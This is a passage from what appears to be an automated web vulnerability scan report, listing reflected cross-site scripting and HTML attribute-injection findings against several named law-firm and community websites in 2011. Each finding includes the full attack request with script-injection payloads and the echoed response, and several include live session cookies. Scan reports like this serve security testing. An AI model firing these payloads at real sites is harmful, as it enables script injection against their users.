Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico7323a'a%3d'b'9d27131e28e HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920; ScreenHeight=1200; __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; __utmc=57823037; __utmb=57823037.1.10.1303088795

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:08:29 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21837


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/favicon.ico7323a'a='b'9d27131e28e&Language=1' class='printhide'>
...[SNIP]...
4.46. http://www.faegre.co.uk/getdoc.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /getdoc.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bebcd'a%3d'b'0454001b26b was submitted in the REST URL parameter 1. This input was echoed as bebcd'a='b'0454001b26b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /getdoc.aspxbebcd'a%3d'b'0454001b26b HTTP/1.1
Host: www.faegre.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; ScreenHeight=1200; __utmc=57823037; __utmb=57823037.1.10.1303088795; ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920;

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 18 Apr 2011 01:53:07 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21759


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/getdoc.aspxbebcd'a='b'0454001b26b&Language=1' class='printhide'>
...[SNIP]...
4.47. http://www.faegre.co.uk/index.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /index.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c16f9'a%3d'b'ba8a4d63c3b was submitted in the REST URL parameter 1. This input was echoed as c16f9'a='b'ba8a4d63c3b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /index.aspxc16f9'a%3d'b'ba8a4d63c3b HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:07:40 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=tyalqvn03txsucuhd3p4zp45; path=/
Cache-Control: private
Content-Length: 21830


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/index.aspxc16f9'a='b'ba8a4d63c3b&Language=1' class='printhide'>
...[SNIP]...
4.48. http://www.faegre.co.uk/jscripts.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /jscripts.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5971b'a%3d'b'00ef94682dd was submitted in the REST URL parameter 1. This input was echoed as 5971b'a='b'00ef94682dd in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /jscripts.js5971b'a%3d'b'00ef94682dd HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
Referer: http://www.faegre.co.uk/showlocation.aspx?Show=59
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:07:42 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21837


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/jscripts.js5971b'a='b'00ef94682dd&Language=1' class='printhide'>
...[SNIP]...
4.49. http://www.faegre.co.uk/rankingawards [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /rankingawards

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1e227'a%3d'b'fc9443d5eba was submitted in the REST URL parameter 1. This input was echoed as 1e227'a='b'fc9443d5eba in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /rankingawards1e227'a%3d'b'fc9443d5eba HTTP/1.1
Host: www.faegre.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; ScreenHeight=1200; __utmc=57823037; __utmb=57823037.1.10.1303088795; ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920;

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 18 Apr 2011 01:53:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21773


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/rankingawards1e227'a='b'fc9443d5eba&Language=1' class='printhide'>
...[SNIP]...
4.50. http://www.faegre.co.uk/rankingawards [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /rankingawards

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0ba0"><script>alert(1)</script>3b3f53be5d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rankingawards?f0ba0"><script>alert(1)</script>3b3f53be5d6=1 HTTP/1.1
Host: www.faegre.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; ScreenHeight=1200; __utmc=57823037; __utmb=57823037.1.10.1303088795; ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:52:16 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 27013


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<meta property="og:url" content="http://www.faegre.co.uk/rankingawards?f0ba0"><script>alert(1)</script>3b3f53be5d6=1"/>
...[SNIP]...
4.51. http://www.faegre.co.uk/showlocation.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /showlocation.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dccab'a%3d'b'3ecfe53eaec was submitted in the REST URL parameter 1. This input was echoed as dccab'a='b'3ecfe53eaec in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /showlocation.aspxdccab'a%3d'b'3ecfe53eaec?Show=59 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:08:11 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21879


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/showlocation.aspxdccab'a='b'3ecfe53eaec&Language=1' class='printhide'>
...[SNIP]...
4.52. http://www.faegre.co.uk/showlocation.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /showlocation.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 933ee--><script>alert(1)</script>62c0f821c24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /showlocation.aspx?Show=59&933ee--><script>alert(1)</script>62c0f821c24=1 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:07:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 38235


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<!-- /showlocation.aspx?Show=59&933ee--><script>alert(1)</script>62c0f821c24=1 -->
...[SNIP]...
4.53. http://www.faegre.co.uk/showlocation.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /showlocation.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27f77"><script>alert(1)</script>dd90c38e8c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /showlocation.aspx?Show=59&27f77"><script>alert(1)</script>dd90c38e8c9=1 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:07:34 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 38228


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<meta property="og:url" content="http://www.faegre.co.uk/showlocation.aspx?Show=59&27f77"><script>alert(1)</script>dd90c38e8c9=1"/>
...[SNIP]...
4.54. http://www.faegre.co.uk/showlocation.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /showlocation.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3694'><script>alert(1)</script>9518c0ad2f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /showlocation.aspx?Show=59&f3694'><script>alert(1)</script>9518c0ad2f6=1 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:07:38 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 38223


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='showlocation.aspx?Show=59&f3694'><script>alert(1)</script>9518c0ad2f6=1&Language=1' class='printhide'>
...[SNIP]...
4.55. http://www.friedfrank.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.friedfrank.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bd98"><a>d763519c72f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?5bd98"><a>d763519c72f=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 15:12:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSMOBILE=1;path=/
Set-Cookie: JSMOBILE=0;path=/
Set-Cookie: CFID=31359028;path=/
Set-Cookie: CFTOKEN=81108497;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<a href="index.cfm?5bd98"><a>d763519c72f=1&fontsize=1" class="linkWhite">
...[SNIP]...
4.56. http://www.friedfrank.com/index.cfm [more parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The value of the more request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83c9c"><a>23920438f4a was submitted in the more parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /index.cfm?pageID=42&itemID=729&more=183c9c"><a>23920438f4a HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:07:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<a href="index.cfm?pageID=42&itemID=729&more=183c9c"><a>23920438f4a&fontsize=1" class="linkWhite">
...[SNIP]...
4.57. http://www.friedfrank.com/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1499e"><a>e4e0d068b9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /index.cfm?pageID=42&itemID=1175&1499e"><a>e4e0d068b9f=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:07:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSMOBILE=1;path=/
Set-Cookie: JSMOBILE=0;path=/
Set-Cookie: CFID=31350049;path=/
Set-Cookie: CFTOKEN=21144502;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<a href="index.cfm?pageID=42&itemID=1175&1499e"><a>e4e0d068b9f=1&fontsize=1" class="linkWhite">
...[SNIP]...
4.58. http://www.humaniplex.com/blogs/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /blogs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e8053'><script>alert(1)</script>337ba0eeb0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/?e8053'><script>alert(1)</script>337ba0eeb0a=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.8.10.1303159302; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:43:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:43:48 GMT; path=/; domain=.humaniplex.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27279


<html>
<head>


<title>
HX - Blogs!
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http://www.humaniplex.com/labels
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/blogs/?e8053'><script>alert(1)</script>337ba0eeb0a=1'>
...[SNIP]...
4.59. http://www.humaniplex.com/classifieds/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /classifieds/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1db1d'><script>alert(1)</script>a70fef5bec3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /classifieds/?1db1d'><script>alert(1)</script>a70fef5bec3=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.7.10.1303159302

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:44:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:44:15 GMT; path=/; domain=.humaniplex.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 181324

<style type="text/css">

.spacer
{
   width: 20px;
}

.level_0
{
   display: block;
   text-align: left;
   text-decoration: none;
   font-family:arial;
   font-size:16px;
   color: #FFFFFF;
   border:
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/classifieds/?1db1d'><script>alert(1)</script>a70fef5bec3=1'>
...[SNIP]...
4.60. http://www.humaniplex.com/clubs/list [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /clubs/list

Issue detail

